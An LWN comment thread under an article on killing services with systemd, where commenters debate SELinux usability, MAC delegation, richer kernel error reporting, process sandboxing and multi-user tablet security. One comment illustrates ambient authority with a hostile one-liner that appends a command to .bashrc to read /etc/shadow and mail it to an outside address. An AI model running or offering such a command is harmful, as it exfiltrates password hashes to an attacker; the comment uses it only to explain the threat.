systemd for administrators - killing services
So again, what is so new and fancy about killing services in systemd? Well, for the first time on Linux we can actually properly do that. Previous solutions always depended on the daemons to cooperate and bring down everything they spawned when they themselves terminated. However, usually if you want to use SIGTERM or SIGKILL you are doing that because they are not cooperating properly with you.
Posted Nov 19, 2010 20:37 UTC (Fri)
by martinfick (subscriber, #4455)
[Link] (53 responses)
Now, all we need is for users to become hierarchical, and perhaps systemd could even help with this. Every real (human) user should, on login, be started in their own isolated LXC container. In this container the human is root and can su to any subuser. Next, like in android, each high-level application that a human user runs could then run as its own userid inside this container. Human users could this way shield their data from their apps, something which sadly they cannot do today in unix unless you pretend it is a single-user system.
Posted Nov 19, 2010 21:01 UTC (Fri)
by SEJeff (guest, #51588)
[Link] (39 responses)
You might also read up on sVirt[2] which mixes vms and SELinux for Information Assurance.
[1] http://www.cs.utah.edu/flux/fluke/html/flask.html
Posted Nov 19, 2010 21:16 UTC (Fri)
by martinfick (subscriber, #4455)
[Link] (9 responses)
As for the bad rap, well, perhaps it is deserved. I can't get my head around what these tools do by reading any of the intro pages for these products, but I can wrap my head around the android security model in about one sentence.
Posted Nov 19, 2010 22:02 UTC (Fri)
by drag (guest, #31333)
[Link] (8 responses)
The people who program the applications and/or build the packages, or at least it should be.
Selinux policies should be bundled with the application to make any sense at all really. We don't go around editing a global configuration file or set of configurations in /etc/posix_acls/ whenever we install software, do we?
Imagine how much of a nightmare that would be, having to edit an M4 script to set permissions on your home directory and such:
Ok... so I want to share a file in /tmp/. I need to go in and copy and paste the /tmp configuration file out of /etc/posix_acls/directories/, make a new file for it, edit the directory stuff out, add a new permission, go back into /etc/posix_acls/, run make, run /etc/init.d/posix_acls apply, and then that's it.
Then, just to make it easy, I will have a little icon on my desktop that will pop up when somebody else tries to access /tmp/shared_file and they don't belong to the newly created tmp_shared_file group-role. It would pop up and say something to the effect of:
And what is worse is that SELinux is exponentially more complicated.
Something like that.
SELinux itself is a wonderful thing, but it's so unusable that it might as well not exist. For the majority of people and use cases it provides no benefit.
They need to rethink the design, get rid of the nightmare macro language configurations, lay things out in a hierarchical tree that makes it obvious how things are inherited and such things.
I envision an SELinux shell where you can navigate around the file system and examine running processes, see open files being used, and so on and so forth. Something that makes it easy to understand what is going on. Something like that.
Until an average administrator with a few hours of exposure can point at any random file on a file system and figure out quickly (in under five seconds) what happens when Apache or another process tries to touch it, it's not going to be something that is useful.
Posted Nov 19, 2010 22:15 UTC (Fri)
by martinfick (subscriber, #4455)
[Link] (7 responses)
In other words, if user writes a new script and wants to test it out on some files, can he prevent any bugs in his script from deleting all the files in his home directory? Then, once he trusts the script, can he allow it to actually modify files in his home dir without requiring root privileges (remember, this is a multi user system, he is not root)?
Admins want to control what users do, they write security tools aimed at that. But what about users, how can I protect myself from myself without relying on an admin (or application packager) to have anticipated my personal use cases?
Posted Nov 19, 2010 22:29 UTC (Fri)
by drag (guest, #31333)
[Link] (6 responses)
Then it should be possible for a user to launch the 'selinux-shell' (or sesh for short :P ) to control the rights of individual processes in his 'delegated realm'.
----------------------------
However, you may be correct in thinking that, with powerful new tools like LXC that can carve up namespaces in Linux in a secure manner, there really is no good reason why each user cannot just be root and use normal Unix-style user and group permissions to control the rights of individual applications. Much like Android.
Posted Nov 20, 2010 3:25 UTC (Sat)
by elanthis (guest, #6227)
[Link] (5 responses)
There is an SELinux sandbox utility, but it's an all-or-nothing solution; I can use it to remove a process's ability to do just about everything, or I can run the process with full default access.
Posted Nov 21, 2010 8:43 UTC (Sun)
by epa (subscriber, #39769)
[Link] (3 responses)
You have to become root to set any policy even though it may apply only to processes you own? No wonder virtualization is so popular, when the ability for independent groups to share a single Linux instance keeping out of each other's way is so limited.
(Not trying to blame you personally for SELinux's deficiencies or imply that you are defending them - just really surprised that security software, of all things, makes the Windowsish error of requiring administrator access to be useful for anything.)
Posted Nov 21, 2010 19:55 UTC (Sun)
by jackb (guest, #41909)
[Link] (2 responses)
I believe that is what the phrase "mandatory access control" means. The administrators set the policy and the users have no choice but to follow it.
Posted Nov 21, 2010 21:58 UTC (Sun)
by drag (guest, #31333)
[Link]
MAC means that you have controls that exist for a user account that are not controllable by the user account.
That does not preclude you delegating portions of your policy as part of your policy.
What if you have multiple administrators? Do you want to give them all unrestricted root access all the time to be able to do their jobs?
Posted Nov 22, 2010 10:32 UTC (Mon)
by epa (subscriber, #39769)
[Link]
Posted Nov 21, 2010 18:01 UTC (Sun)
by nix (subscriber, #2304)
[Link]
More important I think is that the SELinux configuration comprises a graph of privilege transitions, and adding extra transitions to that graph might very well break invariants root is depending on for the security of the system. I see no reason why we couldn't allow the user to add new privilege transitions to that graph, as long as they could only transition *from* root-added contexts, not *to* them. But, as far as I know, this is not implemented.
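The invariant described here can be sketched as a simple admission check on user-supplied graph edges. A minimal illustration in Python; the context names are invented for the demo, not real SELinux types:

```python
# Admin-defined ("root-added") contexts vs. contexts an unprivileged
# user has added for their own processes. All names here are made up.
ROOT_CONTEXTS = {"httpd_t", "sshd_t"}
user_contexts = {"my_sandbox_t", "my_script_t"}

def user_may_add_transition(src: str, dst: str) -> bool:
    """A user-supplied edge is admissible only if it cannot re-enter the
    root-defined part of the graph: transitioning *from* a root-added
    context is fine, transitioning *to* one is not."""
    return src in ROOT_CONTEXTS | user_contexts and dst in user_contexts
```

Under this rule, user additions can only ever drop privileges into user-managed territory, so no invariant root relies on inside the admin-defined subgraph can be broken.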
Posted Nov 19, 2010 21:22 UTC (Fri)
by jwb (guest, #15467)
[Link] (28 responses)
For my part, I have long looked upon SELinux as the means by which random Red Hat insiders screw up otherwise perfectly good software. Probably if it had better logging, meaningful error codes, and management tools that can be explained in less than an hour, people would look upon it more favorably.
Posted Nov 20, 2010 0:05 UTC (Sat)
by donwaugaman (subscriber, #4214)
[Link] (26 responses)
SELinux's answer to everything is EPERM + log reason for denial to /var/log/audit/audit.log. It's a little bit like asking a teenager to do something, getting a "NO!" response, and then having to look in their diary for why.
It would be nice, although not thread-safe, for an app that suspects it's being denied by SELinux to be able to query for a better "reason" for the previous denial. Something tells me that the kernel maintainers don't exactly want to get into the business of creating a per-process rich error reporting facility, to say nothing of the difficulties in designing one that is abstracted for other security systems.
Posted Nov 20, 2010 14:42 UTC (Sat)
by tialaramex (subscriber, #21167)
[Link] (25 responses)
We were lucky in the early days of Linux to have people who'd grown up on Unix systems and were not too shocked to discover that just because the file exists doesn't mean you can delete it. The variations from the Unix wars period meant that even if your sysadmin cursed at tools like ps or df for having the "wrong" behaviour compared to what they grew up with, they weren't actually surprised.
Now we have to wait for a generation of "Well the POSIX permissions check out, so it's clearly broken, let's just switch off SELinux" to collect their pensions and be replaced by people who know to look in the logs, know how to interpret what the logs mean, etc. This isn't really so different from waiting for the generation of programmers who swore up and down that they didn't need version control to go collect _their_ pensions.
Posted Nov 20, 2010 19:14 UTC (Sat)
by drag (guest, #31333)
[Link]
This is not going from 'being able to crank a motor' to 'operating the sat nav'.. this is going from 'being able to start a Model T' to 'being able to hand-crank a motor on a sat-nav satellite in orbit'. You're going from requiring 'old timers' to use 'ls -l' and understand the user, group, and other permission model, to requiring an understanding of every esoteric detail of Linux userland, configuration files that reach a whole new level of complexity and size, AND still a deep understanding of everything that every Linux/Unix administrator had to know in the past.
The log files are much less useful than you assume, I think. Whenever I use Fedora, the command lines, permission fixes and whatnot recommended by the tools tell me to open up SELinux permissions in an overly wide manner. Following the advice given to you by the SELinux tools and the configuration files is really a bad idea.
Plus, SELinux needs to get rid of the macro-language-based configuration files. You would think that people would have learned from Sendmail why this is a horrible idea...
In terms of actually increasing the security of Linux systems, it's only useful, so far, for improving certain types of network services. If you're an organization that has a few hundred thousand dollars to drop on improving security on your servers, then SELinux may make sense, since you can hire the experts and spend a huge amount of time customizing SELinux to your specific configurations.
But for any sort of desktop solution or whatever, SELinux is worthless. The only way it works acceptably now is by simply removing all policy restrictions on applications run from a local terminal, and even then people still regularly run into issues with it. There is no point in it even being there if you're going to run the policies like that, since it's going to be utterly worthless against the sort of threats and problems that desktops are likely to run into.
I like SELinux and I think that it can be something good, but saying 'oh, people just need to learn to read log files' utterly misses the point of why it sucks and why people are not finding any purpose to its existence.
Posted Nov 21, 2010 1:26 UTC (Sun)
by jwb (guest, #15467)
[Link] (3 responses)
Also, you can take your ignorant ageism and cram it.
Posted Nov 21, 2010 16:59 UTC (Sun)
by tialaramex (subscriber, #21167)
[Link] (2 responses)
I catch myself with these same attitudes, and I have to go back and re-assess, did I just dismiss this solution because it's actually technically deficient for our purpose, or because it's unfamiliar and I'd rather use something I already know?
Posted Nov 21, 2010 22:11 UTC (Sun)
by dlang (guest, #313)
[Link]
you already know the pitfalls and traps of the one approach; you don't yet know the problems with the new tool. I see a lot of people who see the claims of new tools (even open-source tools) and assume that they don't have problems and will 'just work', ignoring the fact that _every_ tool has problems and limitations; you will need to learn those as well.
I've seen companies paralyzed for years because of poor decisions to depend on new stuff instead of getting something done with existing capabilities.
I'm not saying that learning something new is bad by any means, but I am saying that there can be a significant amount of value in leveraging existing knowledge.
the hard thing is to find the balance between the two extremes: on the one extreme, you shoehorn things into tools that really don't fit (or don't do something because the existing tools don't work and you don't want to learn the new ones); on the other extreme, you spend all your time studying new tools and finding the problems with them, and don't get projects accomplished because you spent the time on groundwork for the new tools instead.
Posted Nov 22, 2010 6:51 UTC (Mon)
by malor (guest, #2973)
[Link]
There's lots of 'tools du jour' in the computer world, fads that come and go. Identifying the ones with lasting value is not an easy thing, and if you choose poorly, it can cost your company a very great deal of time and money.
If you try to jam prospective hires into a bad framework, you'll lose most of their value. By asking them something like "How much effort are you willing to put into Ruby on Rails?", you're short-circuiting a great deal of their experience. Ask them questions like, "We're doing X. How would you go about architecting that?" You may just find that their napkin solution is better than what you already have.
Posted Nov 21, 2010 8:49 UTC (Sun)
by epa (subscriber, #39769)
[Link] (19 responses)
Long ago somebody came up with the excellent idea of error return codes so you could see why an operation failed without having to dig through a logfile. It's unfortunate that the return code is just a single integer, which doesn't give much information. The system call needs to return an error string as well.
In a generation, the culture of 'a single fixed integer error code was good enough when we were growing up, so it's good enough now' will die out, new variants of system calls will be introduced returning usable and detailed error messages, and apps will quickly switch over to them. At that point SELinux and similar schemes will be easy to set up and fix, and people won't need to disable them to get predictable error behaviour.
(Yes, if you return strings for errors as well as integers then there are internationalization issues and other warts. I don't see how this can possibly be worse than cramming everything into a choice of 40 or so fixed integers.)
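The "single fixed integer" ceiling is easy to see from user space. A short Python illustration (the path is arbitrary; any failing syscall would do):

```python
import errno
import os

def describe(exc: OSError) -> str:
    # Everything user space learns about the failure is one integer;
    # strerror() merely maps it to a canned phrase, with no hint of
    # *which* check failed (mode bits? an ACL? an SELinux policy?).
    return (f"errno={exc.errno} ({errno.errorcode[exc.errno]}): "
            f"{os.strerror(exc.errno)}")

try:
    open("/no/such/path/for-demo")
except OSError as e:
    msg = describe(e)
```

A POSIX open() denied by SELinux and one denied by mode bits both surface here as the same EACCES integer, which is exactly the diagnostic gap being complained about.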
Posted Nov 21, 2010 11:32 UTC (Sun)
by Cyberax (✭ supporter ✭, #52523)
[Link] (18 responses)
Error strings are not good. Exceptions are really what you need, they can provide both programmatic and textual description of a problem. And they should be inheritable, so your code can check for generic FileSystemProblemException or for fine-grained FilePermissionException.
Adding C-language interface with exception support is possible, though a bit clumsy.
Posted Nov 21, 2010 18:33 UTC (Sun)
by elanthis (guest, #6227)
[Link] (2 responses)
If you're looking for the automatic propagation of exceptions up through the call chain, then yes it's clumsy, but it's not any better even in C++. Exceptions and low-level programming are not compatible. Writing "exception safe" code in C++ is damn near impossible at times, and they are easily the one big failure of C++'s design.
Posted Nov 22, 2010 0:28 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (1 responses)
Yes, that's what I was thinking. It's possible, but not easy.
>Exceptions and low-level programming are not compatible. Writing "exception safe" code in C++ is damn near impossible at times, and they are easily the one big failure of C++'s design.
You might want to look into Windows drivers. They use SEH (Structured Exception Handling) quite thoroughly in kernel mode.
Posted Nov 22, 2010 14:39 UTC (Mon)
by dgm (subscriber, #49227)
[Link]
When you take into account that Microsoft attributes most BSODs in Windows to poorly developed drivers, it doesn't sound like a great idea any more.
Posted Nov 21, 2010 23:51 UTC (Sun)
by jzbiciak (guest, #5246)
[Link] (14 responses)
I think you have the API direction inside out, though. If the kernel returned an "error details" structure, a nice POD struct you could ignore if you so choose, you get all the value the kernel has to offer in terms of telling you what happened, without requiring the language to support exceptions. You also remain backward compatible.
Languages that do offer exceptions could then offer to throw exceptions based on the contents of this error detail structure as an optional feature. Exceptions in C++ can be rather tricky, and so there could be very good reasons why a programmer chooses not to enable them. Also, existing programs aren't expecting these new exceptions anyway.
You could then standardize the set of exceptions, offer them in the standard library, and step back and let people start using them where they find them useful. Others could sit back and rely on the error reporting structure. And the rest of the world can continue to muddle on with errno until they upgrade their software.
Finally, folks could then start upgrading the core OS components (such as cat, cp, mv, etc.) to understand the additional error details to provide better error reporting over time. Now you have a migration path. And if some crusty old program that won't be upgraded can't open a file, basic commands such as "cat file > /dev/null" would be able to give you what you need to know.
At least, that's a first cut at how I'd approach it.
Posted Nov 22, 2010 0:30 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link]
We'll have problems in the intermediate libraries. For example:
FILE *fl=...;
We can work around this to a certain degree, of course.
Posted Nov 22, 2010 10:30 UTC (Mon)
by epa (subscriber, #39769)
[Link] (8 responses)
Posted Nov 22, 2010 14:20 UTC (Mon)
by Cyberax (✭ supporter ✭, #52523)
[Link] (3 responses)
That's the point of exceptions - you DON'T need to enumerate everything in advance.
For example, an application can check for a generic PermissionException. Which can later be subclassed as PosixPermissionException and SELinuxPermissionException. So sophisticated applications can check for these exceptions while older applications will just detect a generic permission error.
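The layering described here is straightforward in any exception-capable language. A sketch in Python, using the class names from the comment (they are illustrative, not from any real library):

```python
class PermissionException(Exception):
    """Generic permission failure -- all an older application knows about."""

class PosixPermissionException(PermissionException):
    def __init__(self, mode: int):
        super().__init__(f"denied by mode bits {oct(mode)}")
        self.mode = mode

class SELinuxPermissionException(PermissionException):
    def __init__(self, scontext: str, tcontext: str):
        super().__init__(f"denied: {scontext} -> {tcontext}")
        self.scontext, self.tcontext = scontext, tcontext

def legacy_handler(op):
    # Code written before the subclasses existed still catches them,
    # because it checks only for the generic base class.
    try:
        op()
        return "ok"
    except PermissionException as e:
        return f"permission error: {e}"

def denied_op():
    raise SELinuxPermissionException("user_u:user_t", "etc_t")

result = legacy_handler(denied_op)
```

The old application degrades gracefully to "a permission error happened", while a newer one can catch SELinuxPermissionException specifically and inspect the contexts.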
Posted Nov 22, 2010 23:49 UTC (Mon)
by marcH (subscriber, #57642)
[Link]
Posted Nov 24, 2010 11:41 UTC (Wed)
by epa (subscriber, #39769)
[Link] (1 responses)
> For example, an application can check for a generic PermissionException. Which can later be subclassed as PosixPermissionException and SELinuxPermissionException.
Providing programmatic information, whether by a runtime-inspectable class hierarchy or any other way, is excellent. It doesn't remove the need for informative error messages so that humans can diagnose problems.
Posted Nov 24, 2010 11:52 UTC (Wed)
by Cyberax (✭ supporter ✭, #52523)
[Link]
Posted Nov 22, 2010 15:49 UTC (Mon)
by jzbiciak (guest, #5246)
[Link]
What stops you from defining the error return structure as, say:
You don't need to enumerate all possible failure modes in advance. You merely need to build in some future-proofing, along with a way for code to recognize whether it can or can't handle the information it's provided. You can keep adding new error formats to the union without breaking current users.
If you factor enough of the most common information out (i.e. add enough general-purpose fields where I put "put some more common fields here"), then most programs won't even need to look into 'details' for further details. Any standardized "human-readable report" formatter should be updated whenever we add more formats to the "details" union. And finally, programs that actually can take proactive action given a complex error report can do their job without having to parse a string.
Exception-reporting languages can go nuts constructing whatever fancy exception object they like, using subclasses as needed to provide fine-grained distinctions when possible. But, if you really, really wanted to provide an error string as an escape valve, nothing stops you from doing this:
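The code blocks in the comment above did not survive extraction. A hedged reconstruction of the kind of tagged-union "error details" record being described, modeled with Python's ctypes (all field names, format tags, and sizes are invented for illustration):

```python
import ctypes

# Tag values identifying which union member is valid; new formats append here.
FORMAT_POSIX, FORMAT_SELINUX = 1, 2

class PosixDetails(ctypes.Structure):
    _fields_ = [("mode_bits", ctypes.c_uint32),
                ("owner_uid", ctypes.c_uint32)]

class SelinuxDetails(ctypes.Structure):
    _fields_ = [("scontext", ctypes.c_char * 64),
                ("tcontext", ctypes.c_char * 64)]

class DetailsUnion(ctypes.Union):
    _fields_ = [("posix", PosixDetails),
                ("selinux", SelinuxDetails)]

class ErrorReport(ctypes.Structure):
    _fields_ = [("size", ctypes.c_uint32),    # lets old readers skip data they don't know
                ("format", ctypes.c_uint32),  # tag: which union member is valid
                ("errno_", ctypes.c_int32),   # the classic integer, still present
                # ... "put some more common fields here" ...
                ("details", DetailsUnion)]

rep = ErrorReport(size=ctypes.sizeof(ErrorReport),
                  format=FORMAT_SELINUX, errno_=13)
rep.details.selinux.scontext = b"user_u:user_t"

# A legacy consumer reads only the classic integer and ignores the rest.
old_reader_view = rep.errno_
```

A reader that doesn't recognize `format` falls back to `errno_`, which is the backward-compatibility property the comment is after.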
Posted Nov 22, 2010 21:05 UTC (Mon)
by mfedyk (guest, #55303)
[Link] (2 responses)
Posted Nov 22, 2010 22:12 UTC (Mon)
by HenrikH (subscriber, #31152)
[Link]
Posted Nov 24, 2010 11:43 UTC (Wed)
by epa (subscriber, #39769)
[Link]
Posted Nov 23, 2010 0:30 UTC (Tue)
by vonbrand (subscriber, #4458)
[Link] (3 responses)
Great. It took GNU around 20 years to rewrite the basic commands for Unix, now you propose starting all over again.
Posted Nov 23, 2010 1:04 UTC (Tue)
by jzbiciak (guest, #5246)
[Link] (2 responses)
If the extended error information is made available to a tracing process, then you could possibly make a simple wrapper that captures and prints out the extended error details.
Anyway, I'm not seriously proposing someone go off and do all this. Rather, I'm describing where I'd start if I were to go off and do it, and how I'd try to build backward compatibility in. For most cases, this feels like massive, massive overkill.
Posted Nov 23, 2010 2:43 UTC (Tue)
by cmccabe (guest, #60281)
[Link] (1 responses)
Posted Nov 23, 2010 2:52 UTC (Tue)
by cmccabe (guest, #60281)
[Link]
Posted Nov 23, 2010 5:04 UTC (Tue)
by cmccabe (guest, #60281)
[Link]
I know I shouldn't take part in Yet Another Selinux flamewar, but I just can't resist...
I like the ideas behind selinux and I run it on my home computer. However, I can't help but feel that it is another example of a conflated design.
The problem is that UNIX processes run with way, way too much ambient authority. That much has been known since the 1980s (see "The Confused Deputy", a classic paper on the topic.) The distinction between user accounts and root accounts on most systems is paper-thin. For example, a compromised Firefox process could easily append "sudo cat /etc/shadow | mail boris@badunov.ru" to your .bashrc. Why not? The .bashrc is owned by you, not by root.
What we needed was a good sandboxing mechanism for processes. For instance, we need a way for processes to give up the ability to send network traffic, or access certain hardware devices. To keep processes from writing to your home directory or other sensitive places, we needed something like a beefed-up chroot. (I'm aware of the problems with allowing user processes to run chroot, but I'm talking about an administrator setup here.)
Given those primitive mechanisms, we could have implemented any security policy we wanted. Instead, what we got was selinux, smack, tomoyo and its brethren. selinux injects policy directly into the kernel through selinux, um, "policies." I'm glad that a DOD-compliant security system for Linux exists. However, I can't help but feel that most users, given the choice, would choose something much simpler. The problem is that by combining the mechanism and the policy, users have to choose all or nothing. Most sysadmins I have talked to laugh at me for being open-minded enough to even consider running selinux, and happily choose "nothing."
I think to make progress, we need to create "selinux from userspace." We should introduce a few simple and general syscalls to sandbox processes. Apple's sandbox_init, and LXC's mechanisms should be good starting points. Then we can implement all the policy of selinux in terms of these simple calls. Application developers, rather than distribution maintainers, should know about and use the syscalls. It may be that most users will choose a simpler policy than selinux. But they shouldn't forgo the mechanisms of mandatory access control security by doing so.
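As a toy illustration of "policy in userspace over simple mechanisms", here is a Python sketch that strips a child process of some ambient authority using nothing but setrlimit(), which an unprivileged process may always call to reduce its own limits. The limit values are arbitrary, and a real design would layer seccomp filters, namespaces, etc. on the same pattern (POSIX-only, since it uses preexec_fn):

```python
import resource
import subprocess
import sys

def make_sandbox(max_open_files: int, max_cpu_seconds: int):
    """Return a hook, run in the child just before exec, that reduces
    the child's own resource limits -- a stand-in for the 'few simple
    and general syscalls' a userspace policy layer could build on."""
    def apply_limits():
        resource.setrlimit(resource.RLIMIT_NOFILE,
                           (max_open_files, max_open_files))
        resource.setrlimit(resource.RLIMIT_CPU,
                           (max_cpu_seconds, max_cpu_seconds))
    return apply_limits

# The child observes the reduced file-descriptor limit:
proc = subprocess.run(
    [sys.executable, "-c",
     "import resource; print(resource.getrlimit(resource.RLIMIT_NOFILE)[0])"],
    preexec_fn=make_sandbox(16, 5),
    capture_output=True, text=True)
```

The point is the shape, not the mechanism: an application developer calls a sandboxing function before doing risky work, and the policy lives in ordinary code rather than in a kernel policy compiler.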
Posted Nov 20, 2010 0:08 UTC (Sat)
by mezcalero (subscriber, #45103)
[Link] (11 responses)
Posted Nov 20, 2010 0:58 UTC (Sat)
by martinfick (subscriber, #4455)
[Link] (10 responses)
Can you provide some of your insights about why you think that the namespacing thing might not be worth it? I can't help but think about how Neil Brown hinted at the problems with unix perms and how solutions similar to namespacing could potentially help:
http://lwn.net/Articles/414618/
Of course, such a solution might still suffer from the problems associated with unix perms which he points out in this same article. But I wonder if shifting the perms model to apply to applications instead of humans would alleviate some of the problems with the model? Now, a human could control group membership easily, so it might be easier to get right, and adapt when it's wrong?
Either way, something has to be done to change the way we see security and user apps. There are new problems that are going to hit us real soon that even the android model will not address. The new internet devices will need a way for the GUIs and apps to be multi user safe.
I should be able to pass you my tablet with a web page for you to read without you being able to look up my passwords or read my email. GUIs are going to need to be able to function in mixed kiosk/user modes. In other words, users are not going to want to have to log in to a device like a tablet every time they pick it up. For a phone, that is OK, but not for a tablet.
A tablet should be by default in a safe kiosk mode so that it can be passed around the kitchen table while everyone watches a youtube video. The tablet owner should not have to be concerned about his user data being accessed when he goes to the bathroom. But, conversely, any user at that table should then be able to check their email easily without worrying about the fact that their password is now known to the device's owner. Perhaps authentication is done by prompting the user via their cell phone, via bluetooth?
With a default kiosk mode, a user should only be prompted for authentication once they do something restricted. And once they authenticate, they should be able to continue where they left off before authentication. At the flick of a button, or after a non use timeout, the device should switch back to kiosk mode while attempting to preserve as much state as possible. This is all really tricky, but it needs to be solved soon to make devices truly useful without being completely insecure. We may soon see how flexible unix is or isn't by how well it can handle these new use cases.
I know, mostly off topic with systemd, sorry. I have a nail and systemd looked like a hammer...
Posted Nov 20, 2010 3:38 UTC (Sat)
by elanthis (guest, #6227)
[Link] (6 responses)
if you're looking for per-application namespacing, things get a lot more complicated. for user-defined namespacing, you run into all the classical security issues of what happens when a user runs a setuid binary inside a specially-crafted chroot jail. on the application level, you are interested in a lot more than just broad filesystem privileges; saying that Firefox is limited to read-only access to everything but its own cache directory sounds nice at first, but then you realize that people like to be able to download and save stuff from the Web, and they may well want to be able to save directly to anywhere in $HOME and not just ~/Downloads... so at best you're back to the per-user namespace/jail setup.
what something like SELinux can do is limit things on a much finer level. Not only do you want Firefox to be limited to writing to $HOME, but you also want to limit what executables it can invoke. However, you can't just give Firefox a filesystem view with the executable bit off on every file, because you need to let it invoke the small handful of binaries it uses, which are kind of spread out all over. You probably want it to be able to invoke viewers for files, for instance (say, an archive reader for that .ZIP you just downloaded). this can be farmed out to other binaries like gnome-open, but those then have to be executable by Firefox. then, since the binaries run need their own set of privileges, which may be broader than Firefox's, you need some kind of secure system that watches for transitions between contexts like that and sets up a new environment instead of simply inheriting Firefox's. and this system is SELinux (or one of the similar alternatives).
unfortunately, back in the realm of efficiency/security, these services run in the kernel and are not safely editable by users. it may be possible to have the service integrate with a daemon that can check for user-defined rules and merge those with the administrator defined ones (never allowing a user to grant more privileges, only allowing them to take privileges away), but there's an assortment of issues that would need to be worked out there regarding race conditions and interfaces and making sure the daemon couldn't inadvertently screw up the whole system if it hangs or starts feeding garbage back to the kernel.
and you can get into potential loops where the daemon needs to read a user config file, which is stored on a FUSE mount, which runs a program to access the filesystem, which goes through kernel access control, which queries the daemon, which needs to read a user config file...
Posted Nov 20, 2010 13:00 UTC (Sat)
by gmatht (guest, #58961)
[Link] (3 responses)
> Not only do you want Firefox to be limited to writing to $HOME ...
Not necessarily, as we might want to save to /mount/My_usb_stick or /mnt/large_partition_for_big_files. Even if we knew that we could limit Firefox to writing to $HOME, data outside $HOME is typically already protected by standard UNIX permissions. What I would want is to limit applications such as Firefox so they can only write (or read) documents that are selected in the file chooser. This was achieved in Plash by overriding GtkFileChooserDialog to call a trusted powerbox; unfortunately Plash seems to be suffering from bitrot.
Posted Nov 20, 2010 13:15 UTC (Sat)
by slashdot (guest, #22014)
[Link] (1 responses)
Right now, Unix security is mostly useless because random applications can still damage all the user data, which just makes no sense.
Applications should only be able to read common system data, read/write to their per-user per-app configuration directory, and access files specifically selected by the user with a special GUI/CLI.
But of course Linux seems to continuously have new local root holes discovered, so until this is somehow fixed, everything else doesn't really matter.
Posted Nov 20, 2010 13:56 UTC (Sat)
by cesarb (subscriber, #6266)
[Link]
Security is not an all or nothing.
For instance, local root holes are not always available. They tend to be fixed quickly after being announced to the world. And unless you are in the "window of vulnerability" which follows the announcement and precedes the patch being applied to your system (this window can be quite small if the vulnerability was first disclosed to the distributions), you are only vulnerable to attackers who are able to discover or buy a new local root vulnerability.
And also, local root holes are not always exploitable from within the application. If a bug in an application allows only for "arbitrary file disclosure" (it can read any file and send it to the attacker), it is still a very bad thing if you have private data on the same user account and the attacker knows its file name, but it probably will not allow enough access to exploit any local root hole. The same would probably still apply if the vulnerability allowed the attacker to delete any file they know the name of, or even if the attack allowed any file to be overwritten with static (not controlled by the attacker) junk data.
And finally, it is still one more barrier the attacker has to jump over. Not only do they have to write an exploit for the application, they now also have to integrate into it either a local root hole or an exploit for whatever sandboxing technology you are using. They have to continuously update it as new local root holes or sandboxing exploits are fixed or become available. If you are lucky, your sandboxing prevents the attacker from being able to exploit the local root hole (for instance, if it needs to use a syscall which your sandbox denies, or if it needs to write to a file your sandbox will not let it write to).
Posted Nov 22, 2010 12:50 UTC (Mon)
by Karellen (subscriber, #67644)
[Link]
Or maybe, if you ban it from reading files that are not explicitly selected by the user, when firefox calls getpwnam() to figure out your username and possibly real name (if you keep that in the gecos field), you want libc's call to open /etc/passwd to require user intervention???
Posted Nov 21, 2010 16:29 UTC (Sun)
by Cyberax (✭ supporter ✭, #52523)
[Link]
So instead you make a 'file system access' daemon which works in a separate process and exposes 'Show Filesystem Dialog and return a file handle' function. Like Chrome does, for example.
It's a bit like capability based security.
Posted Dec 1, 2010 0:03 UTC (Wed)
by ibukanov (subscriber, #3942)
[Link]
A browser should not need even read access to user files. To save a file it would talk to some saving service that would perform the saving operation after asking the user for confirmation. This way a compromised browser could at best ask for user confirmation to write a data stream somewhere. A sensible saver would not even allow overwriting existing files, adding name prefixes to prevent many social-engineering attacks. Similarly, to attach files the browser would need to talk to another service.
The UNIX permission model is enough to cover this if a user can have an extra account and group for each network application they use, perhaps with an extra home directory subtree. Then a normal permission setup, with UNIX domain sockets as communication endpoints to save files etc., would provide a rather secure system without the complexity of SELinux.
Posted Nov 23, 2010 4:09 UTC (Tue)
by cmccabe (guest, #60281)
[Link] (2 responses)
What's wrong with Android's security model? It sounds like exactly what you want. Each application is sandboxed with only the capabilities that the user allowed it to have when it was installed.
> I should be able to pass you my tablet with a web page for you to read
Well, the iPad shipped without any kind of multi-user support at all. So apparently some fairly smart designers in Cupertino disagree with you.
In general, users tend to hate complexity and love simplicity. It's a lot simpler to just buy your kid a separate tablet than it is to fiddle with complex security protocols. Especially when the cost of the tablets gets into the $100 or $200 range, that's the solution that a lot of people are going to take.
It seems like Android could support a simple form of multi-user operation through virtualization. Something like LXC or vserver could provide separate environments for separate users. It should be fairly simple to switch back and forth between users. Since all the daemons would be running in separate containers, there would be no information leakage between the environments.
I guess there is the thorny question of how to share data between different user accounts. I would argue that, at least at first, the two options should be "share with all" and "share with none". The former should just do a global install in some kind of upper-level container that everyone can see. Then the data can be shared with all users. The latter can keep it all private. Add password protection, and you've reached the same level of functionality that MacOS, Windows 7, or Linux ever had. You could probably add more and more security features over time, but there's very little evidence that home users of a tablet want them or could understand them.
Posted Nov 23, 2010 5:49 UTC (Tue)
by martinfick (subscriber, #4455)
[Link] (1 responses)
I believe I clearly answered that question in the section you quoted? Where in android is there ANY support for more than one human user?
> Well, the iPad shipped without any kind of multi-user support at all. So apparently some fairly smart designers in Cupertino disagree with you.
I am sure they are very smart, but I spend very little time thinking about them. What does it matter, since they obviously do not care about my needs or desires?
> In general, users tend to hate complexity and love simplicity. It's a lot simpler to just buy your kid a separate tablet than it is to fiddle with complex security protocols. Especially when the cost of the tablets gets into the $100 or $200 range, that's the solution that a lot of people are going to take.
Simplicity is great. However, even at $100 a pop, I would expect to be able to read my email on my tablet without revealing my password to anyone I happen to show a youtube video to. The cheaper the device, the more likely it will be passed around, shared (people will have less concern for the integrity or loss of the device). I owned a tablet for one week, and this was my first concern when I had guests over. I wouldn't tell you that you should care, but clearly, I do.
> Something like LXC or vserver could provide separate environments for separate users
It seems that perhaps someone suggested that in the first post of this thread. ;)
> You could probably add more and more security features over time, but there's very little evidence that home users of a tablet want them or could understand them.
Well, I think I know at least one user who wants and could understand it (if done well, which is the whole point of this discussion, no?). After reading some of the responses in this thread, I suspect that I am not completely alone. Where is your evidence that no one wants it, or did you just mean that figuratively?
Posted Nov 23, 2010 8:24 UTC (Tue)
by cmccabe (guest, #60281)
[Link]
The notion that users are fundamental to the security model is what's wrong with security on desktop operating systems. It's the capabilities that applications run with that are fundamental-- the more limited, the better.
Running multiple user environments side by side is trivial. It doesn't affect the security model at all. The really interesting question is how those environments share data.
> Where is your evidence that no one wants it, or did you just mean that figuratively?
